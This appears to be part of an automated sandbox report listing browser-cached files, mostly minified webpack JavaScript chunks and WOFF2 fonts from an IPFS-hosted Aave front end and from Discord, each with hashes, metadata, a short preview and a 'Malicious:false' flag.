                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6806],{81902:function(e,t,n){var r;n.d(t,{R:function(){return r}}),function(e){e.supplyCap="supplyCap",e.borrowCap="borrowCap"}(r||(r={}))},25049:function(e,t,n){n.d(t,{Y:function(){return d}});var r=n(59499),o=n(4730),a=n(49501),s=n(81902),i=n(58527),c=n(85893),u=["capType"];function l(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}function p(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?l(Object(n),!0).forEach((function(t){(0,r.Z)(e,t,n[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):l(Object(n)).forEach((function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))}))}return e}var d=function(e){var t=e.capType,n=(0,o.Z)(e,u),r=t===s.R.supplyCap?(0,
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (33464), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):33464
                                                                                                                                                                                                                                                  Entropy (8bit):5.4575880021259335
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:JUNUG7Go3tJaYfTXQIxk+cLNEx94OX5mDCIOzSJ:9CTxLIagCjzO
                                                                                                                                                                                                                                                  MD5:D6C203D7E71602AAD4B90ED2CB6F39D1
                                                                                                                                                                                                                                                  SHA1:D4810054C90A1DA96E0B496E56103C78D10605A4
                                                                                                                                                                                                                                                  SHA-256:68D1958C871E142666C370701BFA921806A5E765335C0DAEA2EDB95091F5C800
                                                                                                                                                                                                                                                  SHA-512:B244DA156D3FB289FC82D009B2BAB74A00D81E33792EB4189F8D927D0750C1FF1B06151895B55F78DC93F50AC1EFB869CA6FEBE6DF99445002201838DB5A4784
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4345],{91166:function(e,t,n){"use strict";n.r(t),n.d(t,{default:function(){return Ve}});var r=n(49501),a=n(62097),o=n(61225),s=n(29630),i=n(79072),c=n(5152),l=n(67294),d=n(34637),u=n(59379),x=n(59631),p=n(75331),h=n(56365),v=n(75084),f=n(30120),g=n(81645),j=n(28533),m=n(68861),b=n(78371),y=n(57609),w=n(74815),Z=n(85893);function P(e){var t=e.text,n=e.href,r=(0,b.Y)((function(e){return e.trackEvent}));return(0,Z.jsx)(v.Z,{variant:"surface",size:"small",sx:{minWidth:"unset"},component:m.rU,href:n,target:"_blank",rel:"noopener",onClick:function(){return r(y.vh.EXTERNAL_LINK,{Link:t})},children:(0,Z.jsxs)(f.Z,{sx:{display:"flex",alignItems:"center"},children:[t,(0,Z.jsx)(g.Z,{sx:{ml:1,fontSize:14},children:(0,Z.jsx)(h.Z,{})})]})})}var A,C=function(){var e=(0,a.Z)(),t=(0,o.Z)(e.breakpoints.up("lg")),n=(0,o.Z)(e.breakpoints.down("xsm")),i=(0,b.Y)((function(e){return e.trackEvent}));return(0,Z.jsx)(w.f,{titleComponent:(0,Z.jsxs)(f.Z,{mb
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (4254), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):4254
                                                                                                                                                                                                                                                  Entropy (8bit):5.567365538036847
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:48:ib71BNSelDmQUwohXsE1s4ZxrK/ZKvQQnuF9FU5CspIulDVy0ZpoIScHFB1P8DUr:0SelSJwS5M/ZKj95DptokoA07wgjVe5n
                                                                                                                                                                                                                                                  MD5:D89E32DA8C25A7900998E9F78A477C62
                                                                                                                                                                                                                                                  SHA1:04B350CA6D25526A95BDBF6F067FD091FCD451B2
                                                                                                                                                                                                                                                  SHA-256:4A90B901C48DBA63AE44E5541F49704B21B3D5DE6EA1611EA6F4F8150BEDFA6C
                                                                                                                                                                                                                                                  SHA-512:EDD59CD9E2115E18BE5BEAE59B39DE208D9810457125D080468F2056652F67FBB244F40E450DD9174A7DB04F9A790C73980C21A4C9FDF4B7300BDB698B21BD51
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[8345],{58345:function(e,t,n){n.r(t),n.d(t,{StakeRewardClaimRestakeModal:function(){return U}});var r=n(67294),o=n(8195),a=n(31959),s=n(49501),i=n(75331),c=n(1279),l=n(29630),u=n(54401),d=n(77912),m=n(60265),v=n(77537),k=n(78371),p=n(84568),x=n(63206),b=n(53601),f=n(63491),j=n(67916),N=n(93608),g=n(57824),y=n(78944),O=n(10343),A=n(59499),h=n(50029),w=n(4730),T=n(87794),C=n.n(T),E=n(89291),S=n(67489),R=n(85893),P=["amountToClaim","isWrongNetwork","sx","symbol","blocked","selectedToken"];function _(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter((function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable}))),n.push.apply(n,r)}return n}var I,D=function(e){var t=e.amountToClaim,n=e.isWrongNetwork,r=e.sx,o=e.symbol,a=e.blocked,c=e.selectedToken,l=(0,w.Z)(e,P),u=(0,k.Y)((function(e){return e.claimRewardsAndStake})),d=(0,E.Q)({tryPermit:!1,handleGetTxns:
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):135526
                                                                                                                                                                                                                                                  Entropy (8bit):5.3741924520452145
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:Qor/gvCRzpAUDZxnwdKPHOWaCHMRGyfpQ1WSK2mg335x+Jk9rLkSYRDeB/P30MSF:t/gvCvbwoOWaCHMLRWkRjMeA2
                                                                                                                                                                                                                                                  MD5:C6375E6BEF51D42031BFC33337AAF902
                                                                                                                                                                                                                                                  SHA1:BBC5DD641026C865B9EC5EA5DE60B937E8E11F78
                                                                                                                                                                                                                                                  SHA-256:7767BE997BDEA366C3C547D068A0D911530839362AC09A4D95EEEEAB62A05EA7
                                                                                                                                                                                                                                                  SHA-512:262EEE415E939C2ACB0269ECC146E92A723B398F3E19A2880D8E564EFF91B081E7DA1BD746358B97F95D4B76F1CEF21B81D6313F208715A3DD454E92D1083F3C
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6146],{31072:function(e){var t;t=function(){return function(e){var t={};function i(s){if(t[s])return t[s].exports;var r=t[s]={exports:{},id:s,loaded:!1};return e[s].call(r.exports,r,r.exports,i),r.loaded=!0,r.exports}return i.m=e,i.c=t,i.p="",i(0)}([function(e,t,i){"use strict";Object.defineProperty(t,"__esModule",{value:!0});var s=i(1),r=i(3),n=i(8),a=i(15);function o(e,t,i){var a=null,o=function(e,t){i&&i(e,t),a&&a.visit(e,t)},u="function"===typeof i?o:null,h=!1;if(t){h="boolean"===typeof t.comment&&t.comment;var c="boolean"===typeof t.attachComment&&t.attachComment;(h||c)&&((a=new s.CommentHandler).attach=c,t.comment=!0,u=o)}var l,p=!1;t&&"string"===typeof t.sourceType&&(p="module"===t.sourceType),l=t&&"boolean"===typeof t.jsx&&t.jsx?new r.JSXParser(e,t,u):new n.Parser(e,t,u);var d=p?l.parseModule():l.parseScript();return h&&a&&(d.comments=a.comments),l.config.tokens&&(d.tokens=l.tokens),l.config.tolerant&&(d.errors=l.errorHan
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (26243), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):26243
                                                                                                                                                                                                                                                  Entropy (8bit):5.330872444614347
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:XyP7vQ9gP3+1pt7+vQVGhLZPGKVzuJifGbI:AsqmpVGhL06
                                                                                                                                                                                                                                                  MD5:631CD392630B6081E65CEF0E6F9CA34F
                                                                                                                                                                                                                                                  SHA1:E11400D2F2DEEEB0B0F0C059B20DAE324AE62500
                                                                                                                                                                                                                                                  SHA-256:2D8895EABBE05A9FADB895A9C9DB354A3AA820044D08059C728C0406488B526A
                                                                                                                                                                                                                                                  SHA-512:AB8DB274E93496E246DC49479A7D8FBF82BBB70302132D5752316DF0E5CB8C33C5D8607C1A6BD04A4779EB38320A07E3FC8BE4A955CD24A8D33494F255AFA95F
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6745],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26-1.61 2.33 0 1.38 1.12 2.5 2.5 2.5.36 0 .69-.08 1-.21v7.21c0 .55-.45 1-1 1s-1-.45-1-1V14c0-1.1-.9-2-2-2h-1V5c0-1.1-.9-2-2-2H6c-1.1 0-2 .9-2 2v16h10v-7.5h1.5v5c0 1.38 1.12 2.5 2.5 2.5s2.5-1.12 2.5-2.5V9c0-.69-.28-1.32-.73-1.77zM12 10H6V5h6v5zm6 0c-.55 0-1-.45-1-1s.45-1 1-1 1 .45 1 1-.45 1-1 1z"}),"LocalGasStation");t.Z=a},89722:function(e,t,r){r.d(t,{Z:function(){return y}});var n=r(87462),o=r(63366),i=r(67294),a=r(86010),c=r(94780),s=r(81719),u=r(78884),l=r(36622),p=r(34867);function f(e){return(0,p.Z)("MuiIcon",e)}(0,r(1588).Z)("MuiIcon",["root","colorPrimary","colorSecondary","colorAction","colorError","colorDisabled","fontSizeInherit","fontSizeSmall","fontSizeMedium","fontSizeLarge"]);var d=r(85893);const h=["baseClassName","classNa
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (50864), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):50864
                                                                                                                                                                                                                                                  Entropy (8bit):5.3522605432239265
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:TjDORnGYYk6RRmDsQWFkkCCU+N+BPiYHWdcy0r51/5HIkcstelT8wO2422nDzUrZ:XwsBiB6HtMqst4Q32GDzf/jyMo
                                                                                                                                                                                                                                                  MD5:1034A0DE7FBC269CCFC9DDBA4AA147EC
                                                                                                                                                                                                                                                  SHA1:DE3DB06BD3FD7926CE07F376978E87924D0302D8
                                                                                                                                                                                                                                                  SHA-256:EB65666971304741EB5BE24D3F0A19071CB2F6B6A9D4AB8E02C5FDA397B25B85
                                                                                                                                                                                                                                                  SHA-512:4806163B04146C031B8D2AF76A58AFDE313B2D5D68308F85803BE0C5C5EC1E91B318327502863ACF17C32B552EB5FBDD4ED4D8F57AFA491875267F244998BD6D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/2284-c8e8c4a9494b7235.js
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[2284],{36919:function(t,e,n){"use strict";var r=n(51833);function i(t,e){for(var n in e)o(e,n)&&(t[n]=e[n])}function o(t,e){return Object.prototype.hasOwnProperty.call(t,e)}t.exports=function(t){r(t)||(t={});for(var e=arguments.length,n=1;n<e;n++){var o=arguments[n];r(o)&&i(t,o)}return t}},9675:function(t,e,n){"use strict";const r=n(33596),i=n(21006),o=n(45294),a=n(9809),s=n(38497),c=n(86378),u=n(28181),l=n(79254),p=n(55707);function f(t,e){if(""===t)return{data:{},content:t,excerpt:"",orig:t};let n=u(t);const r=f.cache[n.content];if(!e){if(r)return n=Object.assign({},r),n.orig=r.orig,n;f.cache[n.content]=n}return function(t,e){const n=o(e),r=n.delimiters[0],a="\n"+n.delimiters[1];let c=t.content;n.language&&(t.language=n.language);const u=r.length;if(!p.startsWith(c,r,u))return s(t,n),t;if(c.charAt(u)===r.slice(-1))return t;c=c.slice(u);const d=c.length,h=f.language(c,n);h.name&&(t.language=h.name,c=c.slice(h.raw.length));let g=
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 105804, version 1.0
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):105804
                                                                                                                                                                                                                                                  Entropy (8bit):7.9975388815479675
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:wo/8sikhizn8CQRxZ9UXsfH0K1yjewt8G5VYqLS8b:a5z3iHCAHjaJtZ5dLS8b
                                                                                                                                                                                                                                                  MD5:007AD31A53F4AB3F58EE74F2308482CE
                                                                                                                                                                                                                                                  SHA1:DFA9F8F3D79BF8A0001FE72EEADAD0490CBA59CC
                                                                                                                                                                                                                                                  SHA-256:152261291C938AA5AAD6A56D52B47FFCB893D1C0387E76D7F270A7382FF786D5
                                                                                                                                                                                                                                                  SHA-512:48AEF263ACA876BA4DB5A596FBB8332524D6B440A8A516E1BAA7899F2F1DA0E1C44452D0380869EC455D27A6E0B931210B1FB669B36E36914CA27235F34E8558
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://app.aave.com/_next/static/media/Inter-SemiBold.fcb100c7.woff2
                                                                                                                                                                                                                                                  Preview:wOF2.......L.......@..................................@...J.`.......l.....T..6.$..N. ..$...-[73..O.....q....8Vg.A....._#..z.6..........!2.........2{..T..~..........................#...L...n....@.G..............m..(..!.N5..3..N....%..Y.$..i.(..V.n.G:L..K.eE|..!.hF..4..h.6F..D.h K.vRO1cT=..v...Z.l.9.{GsV..%.p.@...K*.IK\.Vb.=.g.#nm...f.1Y.m!.....M..'.P.vM".LBK.U....UI.6.F...d.y.Ej<.....l.R..N..;....!w....Q..%..;3...1...#.u4....W.tb.{.+d.....=c.F...#.|.?.......n.aV.l..p....A/..X.F...[........f.O...:..5.F..o'..{a..2......n..w.Q.d...B.O.\k.d...........=7...>.....@.B>zY~.e+>A.0".............n..7..4.%..........o.~.....=N.V..C.Z.......?.)Y...c.....[.|.OM..0["l.z...W[...I.......N..c!W/=.oX..e..f.5&G..g....#.."..b..&0.+...........H....#.P!..)Kgd...t.GLL..|0.x..Q.....56.6.Y.}...v2Y.....W.\.1\<6....?..~.1.#q....~.|F\....E..;.>..y...}.f....['.....sa?.6...{?......G.W............<......gZ.!Jr..Y=b..........G.....`.3{.".I.:...9..'...9.iLm..X.....?$..".p..g
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (40795), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):40795
                                                                                                                                                                                                                                                  Entropy (8bit):5.4272205188788405
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:768:bBgnCjXusvADIIJX++52yT+N0s0Q0ckifweOVXCCIOzvN1SmVT:bBeCjXuGiI0EIQ0ZiIyCjzeYT
                                                                                                                                                                                                                                                  MD5:7625BE13B32F68FD6296AFC64C72EF2C
                                                                                                                                                                                                                                                  SHA1:D9C524DFEA3DBD92239CB0C59D123B676516BC60
                                                                                                                                                                                                                                                  SHA-256:A77551B9AA3F965A856F8E39217F40FE8D8AC3BD27DD8FA9B362DADFF8B4CB1A
                                                                                                                                                                                                                                                  SHA-512:E4430B7EC05C2E6B824A703A6D306C180DD014F4F1417F95D753732202F6ED66C933C9C5C2D305F20F7BEF103425415BDAAAE4AC8D3706B04BF6E1ABF3295E6D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[4345],{84110:function(e){e.exports=function(){"use strict";return function(e,t,r){e=e||{};var n=t.prototype,o={future:"in %s",past:"%s ago",s:"a few seconds",m:"a minute",mm:"%d minutes",h:"an hour",hh:"%d hours",d:"a day",dd:"%d days",M:"a month",MM:"%d months",y:"a year",yy:"%d years"};function s(e,t,r,o){return n.fromToBase(e,t,r,o)}r.en.relativeTime=o,n.fromToBase=function(t,n,s,i,a){for(var l,c,d,u=s.$locale().relativeTime||o,p=e.thresholds||[{l:"s",r:44,d:"second"},{l:"m",r:89},{l:"mm",r:44,d:"minute"},{l:"h",r:89},{l:"hh",r:21,d:"hour"},{l:"d",r:35},{l:"dd",r:25,d:"day"},{l:"M",r:45},{l:"MM",r:10,d:"month"},{l:"y",r:17},{l:"yy",d:"year"}],h=p.length,x=0;x<h;x+=1){var f=p[x];f.d&&(l=i?r(t).diff(s,f.d,!0):s.diff(t,f.d,!0));var v=(e.rounding||Math.round)(Math.abs(l));if(d=l>0,v<=f.r||!f.r){v<=1&&x>0&&(f=p[x-1]);var g=u[f.l];a&&(v=a(""+v)),c="string"==typeof g?g.replace("%d",v):g(v,n,f.l,d);break}}if(n)return c;var m=d?u.futur
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (55973), with no line terminators
                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                  Size (bytes):55973
                                                                                                                                                                                                                                                  Entropy (8bit):5.377020426649596
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:1536:lHEyMA1mVw5TfVPOyebEpizDZpDWm0dzb0:Z9MAcVPnWmGg
                                                                                                                                                                                                                                                  MD5:8F2B634620C31455DDE1DE9376F6AFE0
                                                                                                                                                                                                                                                  SHA1:5E8684991F751A3B8A2097BE28BEC536CA7D7E67
                                                                                                                                                                                                                                                  SHA-256:AE71A0AA24DF8F7EF7A5E8B570EC2037C0717E15ED173D1F601BBD5842E54009
                                                                                                                                                                                                                                                  SHA-512:C60A1D986A3794FFB33768AE75C723FD6666F545972C1615516171E295F0E0E81FDF604F4DC71286CC7808BE050331FD2C0A022A87243890C493E54B62ED674D
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  Preview:(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9605],{54098:function(e,t){var n="undefined"!==typeof self?self:this,i=function(){function e(){this.fetch=!1,this.DOMException=n.DOMException}return e.prototype=n,new e}();!function(e){!function(t){var n="URLSearchParams"in e,i="Symbol"in e&&"iterator"in Symbol,r="FileReader"in e&&"Blob"in e&&function(){try{return new Blob,!0}catch(e){return!1}}(),s="FormData"in e,o="ArrayBuffer"in e;if(o)var a=["[object Int8Array]","[object Uint8Array]","[object Uint8ClampedArray]","[object Int16Array]","[object Uint16Array]","[object Int32Array]","[object Uint32Array]","[object Float32Array]","[object Float64Array]"],c=ArrayBuffer.isView||function(e){return e&&a.indexOf(Object.prototype.toString.call(e))>-1};function u(e){if("string"!==typeof e&&(e=String(e)),/[^a-z0-9\-#$%&'*+.^_`|~]/i.test(e))throw new TypeError("Invalid character in header field name");return e.toLowerCase()}function l(e){return"string"!==typeof e&&(e=String(e)),e}function p
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5533), with no line terminators
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):5533
                                                                                                                                                                                                                                                  Entropy (8bit):5.482858083538453
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:AAP9jlOEIqZx6ry2aib/Ez/nSuUwVedoAPX1B8NWFTmveHV5Pf3VIB6P42H4E4mc:AAPfIJsibc/nSekd5tB8oFpHnf3eBwgb
                                                                                                                                                                                                                                                  MD5:95AE7542EFC3446F900E562F9E80C34D
                                                                                                                                                                                                                                                  SHA1:6BE12DB68A3CE3A42E00D0CDC93F0CB2947374AC
                                                                                                                                                                                                                                                  SHA-256:13405B6B187FC84BF1E9682945DDF607F8B04A9BD21C9A90EDD2FF54B799627B
                                                                                                                                                                                                                                                  SHA-512:43E1394C1C02BD97737BA3FC91AB39CF75BB9BEDBA2453621D801DCBAD61EE871B9F3D8FA673E5357D2C8DC354E3169C5939BE861B962D5974F453482F8D84A2
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/_next/static/chunks/webpack-7cee0530881530e6.js
                                                                                                                                                                                                                                                  Preview:!function(){"use strict";var e={},t={};function n(c){var r=t[c];if(void 0!==r)return r.exports;var a=t[c]={id:c,loaded:!1,exports:{}},f=!0;try{e[c].call(a.exports,a,a.exports,n),f=!1}finally{f&&delete t[c]}return a.loaded=!0,a.exports}n.m=e,n.amdO={},function(){var e=[];n.O=function(t,c,r,a){if(!c){var f=1/0;for(u=0;u<e.length;u++){c=e[u][0],r=e[u][1],a=e[u][2];for(var d=!0,o=0;o<c.length;o++)(!1&a||f>=a)&&Object.keys(n.O).every((function(e){return n.O[e](c[o])}))?c.splice(o--,1):(d=!1,a<f&&(f=a));if(d){e.splice(u--,1);var i=r();void 0!==i&&(t=i)}}return t}a=a||0;for(var u=e.length;u>0&&e[u-1][2]>a;u--)e[u]=e[u-1];e[u]=[c,r,a]}}(),n.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return n.d(t,{a:t}),t},function(){var e,t=Object.getPrototypeOf?function(e){return Object.getPrototypeOf(e)}:function(e){return e.__proto__};n.t=function(c,r){if(1&r&&(c=this(c)),8&r)return c;if("object"===typeof c&&c){if(4&r&&c.__esModule)return c;if(16&r&&"function"===ty
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 179380, version 2.459
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):179380
                                                                                                                                                                                                                                                  Entropy (8bit):7.998791638207558
                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                  SSDEEP:3072:IkairG/VFWmVX/55KB+fV6ZNTJuvdeDsYaZQ9aFftKn/zfRoJC1NTuGo5m5Ss9fY:5aD/VEIXs+fVSNTJ8deoYabFftK/VosY
                                                                                                                                                                                                                                                  MD5:7CF1BE7696BF689B97230262EADE8AD8
                                                                                                                                                                                                                                                  SHA1:8EB128F9E3CF364C2FD380EEFAA6397F245A1C82
                                                                                                                                                                                                                                                  SHA-256:A981989AEE5D4479FFADF550D9ECFF24A4AC829483E3E55C07DA3491F84B12BA
                                                                                                                                                                                                                                                  SHA-512:7D7C7DC08001079D93EF447122DEE49ABD2B7A84D1619A055FF3E7EC0009261AB6ADD018560BFD82ED22B29C1915BFD059F02CD83FED2E15E9AF05A5D0654E06
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/48a594e29497835802fe.woff2
                                                                                                                                                                                                                                                  Preview:wOF2...............L...Q..............................F...v.`..:.....$....6.$...@...D.. ..Z...\..[lI..<....rs.J.....H.H.G..Lc6.X.......2....1...B...d5.a..1......_(.D..&v.......[...Q=..................K........w'.,yl.`.1x0.Ya..B..Ph..6m.D....kE.B`.zG4...%+..!.J......*j.z.......Z.F....~....V.m5...|Xc.eG.x}C.....[U2..:oZ..b..0j.B......9.w.....Z.:..e.t...7...6\O...5e.KUNU9.P....-W./......A.y..E.#N.........ui@.'.m..~.d.Q..vpBv.+p..9.l...Sb..s%...^2.....Z].|......=,.....@....^...5..w.6.a.2...$...[v..A..sG.t....T..L..~....H4..&#....]...W..].V.....Pt....o.Y.....T../..qS....c.O(<..-'P.9s.../.t..G .........o..b....83.^"K......J+..z^2x.L.../=Ts.....]E.....s)Y...y...g...$....da.......*lA...y..<-KoEP>..I.....T.\I..*.d75.M...0..q.F.....&......<~..k7.(.}Q.%.q.<...{..9..0>d.VV..ze...I.<..4M.s.$....k....L ..H.B....2e".3..+..]<..m..4...J.......7r....e...KT..7{:.A2..|...l..m.bS...S+.B..CQ/*.d-..;r.>.....=B.o.....!).[..2......a6.q4ak.^..kyk|.L....{.~..f1..L1..
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7679)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):7728
                                                                                                                                                                                                                                                  Entropy (8bit):5.087323529198084
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:wgSRVk6Wg8lh4Nrviiv1aWPRkDhTt9qwqSBtxCMNMRV0IBSAMD9C+m+rmxARJx3t:RSRVmriLDPRkxtRJxNMRV0IZdSL9ilfA
                                                                                                                                                                                                                                                  MD5:1C6B9D0AD743762986197AE0E81874C1
                                                                                                                                                                                                                                                  SHA1:EABACE4131BA74B108FC891EA843B4F85B218808
                                                                                                                                                                                                                                                  SHA-256:2D739091F602476FCF261435B48A1FAFCE2533564FFF0549D27B47E341B4DCBF
                                                                                                                                                                                                                                                  SHA-512:74FDE9F8997087BB107ED5DDC3A4A37BD24793CAAD605FBDCDD54E9D18AF8F44D0C0E92FB2259AA936BD1B20D5537441EF39D9A7F066323911436184B0138111
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/d67c5e680608266a1f63.js
                                                                                                                                                                                                                                                  Preview:"use strict";(this.webpackChunkdiscord_app=this.webpackChunkdiscord_app||[]).push([["75492"],{849146:function(t,e,n){var r=function(){if("undefined"!=typeof Map)return Map;function t(t,e){var n=-1;return t.some(function(t,r){return t[0]===e&&(n=r,!0)}),n}return function(){function e(){this.__entries__=[]}return Object.defineProperty(e.prototype,"size",{get:function(){return this.__entries__.length},enumerable:!0,configurable:!0}),e.prototype.get=function(e){var n=t(this.__entries__,e),r=this.__entries__[n];return r&&r[1]},e.prototype.set=function(e,n){var r=t(this.__entries__,e);~r?this.__entries__[r][1]=n:this.__entries__.push([e,n])},e.prototype.delete=function(e){var n=this.__entries__,r=t(n,e);~r&&n.splice(r,1)},e.prototype.has=function(e){return!!~t(this.__entries__,e)},e.prototype.clear=function(){this.__entries__.splice(0)},e.prototype.forEach=function(t,e){void 0===e&&(e=null);for(var n=0,r=this.__entries__;n<r.length;n++){var i=r[n];t.call(e,i[1],i[0])}},e}()}(),i="undefined"!
                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (5552)
                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                  Size (bytes):5601
                                                                                                                                                                                                                                                  Entropy (8bit):5.766045335838852
                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                  SSDEEP:96:2XobeWKBub3kiJfaaLUmbybQSfuaVRbm0HMgFfgWuAyEdVAmefr4/8VZPUGkzO:qobtfaa9DSfXDbXMaYPAyEdLefr4/YM2
                                                                                                                                                                                                                                                  MD5:80CACAFAA49067CFB1EF6FD5FC4C898A
                                                                                                                                                                                                                                                  SHA1:3AFCC6ED3A5061D360C7DF946E28485BC5501E6D
                                                                                                                                                                                                                                                  SHA-256:00684B88EC54BE084E748334043FB772B14226404BAE8F54849A2E127581C44D
                                                                                                                                                                                                                                                  SHA-512:368F192E203627292F9EE4E6667FEF7EB63E2ADA5AD61EEFF7D79882685098793B5482433ABD0CC2726C9B8418AFC3F8C34871478CE88900BE3DD782D98AD2CF
                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                  URL:https://discord.com/assets/e09e89ad935c5efae445.js
